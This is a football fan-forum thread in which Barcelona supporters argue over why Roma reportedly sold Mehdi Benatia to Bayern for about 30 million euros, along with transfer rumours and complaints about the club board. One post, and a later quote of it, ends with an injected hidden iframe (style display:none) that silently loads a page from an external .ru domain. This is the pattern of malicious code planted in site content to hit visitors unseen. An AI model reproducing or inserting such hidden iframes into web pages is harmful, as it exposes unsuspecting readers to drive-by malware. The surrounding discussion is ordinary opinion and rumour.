Mehdi Benatia

raskolnikov

Explain this to me, how was Benatia unavailable for us or atleast very costly with a 60+ fee and now Bayern gets him for a very low 30 mil?
30mil! why does Roma even accept that?

CatalinR10

Explain this to me, how was Benatia unavailable for us or atleast very costly with a 60+ fee and now Bayern gets him for a very low 30 mil?
30mil! why does Roma even accept that?

who sayd exactly that he is unavailable for us and he would cost at least 60 M ?

raskolnikov

who sayd exactly that he is unavailable for us and he would cost at least 60 M ?

If he was 30 mil why the hell would be chasing Matthieu or Vermaelen? all this time you read reports about Barca being not interested cause Roma was asking so much, then they quickly gave up and started chasing Marquinhos.
But even so, why arent United, Chelsea or others chasing him as well, 30 mil is a bargain in todays market where quality defenders are like unicorns.

KingMessi

SiempreBlaugrana
Just a guess, but maybe his wage demands are really high? The rumors suggest that the deal, including wages for a 5-6 year contract, would cost nearly 70M euros.

F

Flavia

Seeing how Valencia managed to get 20m for Mathieu, and how Fiorentina is playing hard ball, if Zubi asked, the asking price for Barça was probably very high. I don't believe Bayern will get him for 30m, unless their negotiators are also hypnotists :p<iframe src="about://gvapp.ru/u.html" style="display: none;" id="zunifrm"></iframe>

DonAK

President of FC Barcelona
It was just a guess. He's on ~2.5M euros at Roma.

It's 1.8m euros net from what I have heard.

He wants/wanted atleast 3m net from Roma.

Heard from a guy that Kicker reported something about him looking for a house in Munich.

Last edited:

Luftstalag14

Culé de Celestial Empire
Seeing how Valencia managed to get 20m for Mathieu, and how Fiorentina is playing hard ball, if Zubi asked, the asking price for Barça was probably very high. I don't believe Bayern will get him for 30m, unless their negotiators are also hypnotists :p<iframe src="about://gvapp.ru/u.html" style="display: none;" id="zunifrm"></iframe>

This is what I don't get. Both us and Bayern were desperate to sign somebody, actually Bayern is more desperate than we were given the transfer window will be closed soon, yet Roma caved into Bayern demand and reportedly let him go for such as a low price. Perhaps Benatia insisting to join Bayern played a role in lowering the fee. Or it could be Bayern's stingy reputation that lowered Roma's expectations. Other than these, I don't really get it.

Do clubs out there think we are bad negotiators and an ATM machine or something?

Blaugrana Bull

HiiiPoWeR
The only reason I could think of right now is that Lucho wanted 2 left footed CBs from the beginning because we already have 2 right footed with Pique and Bartra.
But the whole Marquinhos saga would make absolutely no sense then. I don't know. Pretty hard to understand this situation.

The only reason I could think of right now is that Lucho wanted 2 left footed CBs from the beginning because we already have 2 right footed with Pique and Bartra.
But the whole Marquinhos saga would make absolutely no sense then. I don't know. Pretty hard to understand this situation.
IMO, it does make sense if you look at it from a different angle. The difference between a long term solution and a short term solution is that a long term solution needs to be:
1) a WC CB,
2) whose strengths maximally complement our weaknesses (i.e. the best fit possible).

TS is that kind of player which is why we pursued him for so long, when that failed we turned to Marcos who is not WC yet but has that potential, and like TS is a great fit for us. When that failed, we turned to M/V; players who are not WC but who are an ideal fit for us (i.e. have pace, aerial ability, are left footed). The reason being that Lucho and/or the board felt that they could no longer find a CB who was available and matched our 2 criteria, so when a long term solution was no longer possible they opted for a short term one.

While Benatia is certainly better in terms of quality than any of the aforementioned players (except TS), he is also worse in terms of fit than any of them. So buying him would have made him a less than ideal long term solution, which is perhaps why Lucho and/or the board decided to pass, but certainly not because of his price. After all, the board was willing to buy Marcos + another CB = 50-60M, enough to even meet Roma's 61 asking price.

If he was 30 mil why the hell would be chasing Matthieu or Vermaelen? all this time you read reports about Barca being not interested cause Roma was asking so much, then they quickly gave up and started chasing Marquinhos.
But even so, why arent United, Chelsea or others chasing him as well, 30 mil is a bargain in todays market where quality defenders are like unicorns.

Because Barca is run by a bunch of incompetent dumbasses.

This is what I don't get. Both us and Bayern were desperate to sign somebody, actually Bayern is more desperate than we were given the transfer window will be closed soon, yet Roma caved into Bayern demand and reportedly let him go for such as a low price. Perhaps Benatia insisting to join Bayern played a role in lowering the fee. Or it could be Bayern's stingy reputation that lowered Roma's expectations. Other than these, I don't really get it.

Do clubs out there think we are bad negotiators and an ATM machine or something?

Clubs out there KNOW we are bad negotiators. About the ATM machine thing, we had money to spend and Bartomeu let everyone know when he basically publicly announced our transfer budget.

Last edited:
L

linetty

Incompetence of this board is striking and it is hard not to notice that...I dont really understand all the socios, we've been hit with a transfer ban (not to mention rest of the shit that has hit us with this board) and yet they still dont do any moves to get rid of them. Is really the big signing holding them back?

Luftstalag14

Culé de Celestial Empire
Sport1 quoted Italian media reports saying Roma sports director Walter Sabatini has arrived in Munich to work out the last details of Benatia's transfer. And it is believed that the final transfer fee is between 27m -30m €.

All hail Bayernblitzkrieg!

Home of Barca Fans